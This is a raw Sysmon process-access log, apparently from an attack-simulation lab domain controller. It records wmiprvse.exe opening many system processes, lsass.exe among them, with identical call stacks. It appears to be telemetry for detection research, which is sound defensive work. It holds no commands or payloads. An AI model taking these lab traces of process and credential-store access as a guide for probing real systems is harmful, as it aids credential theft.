15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023581Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023580Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023579Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023578Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023577Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.523{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023576Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023575Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023574Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023573Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023572Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023571Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023570Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023569Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023568Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023567Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023566Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023565Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023564Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023563Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:19.507{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023562Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 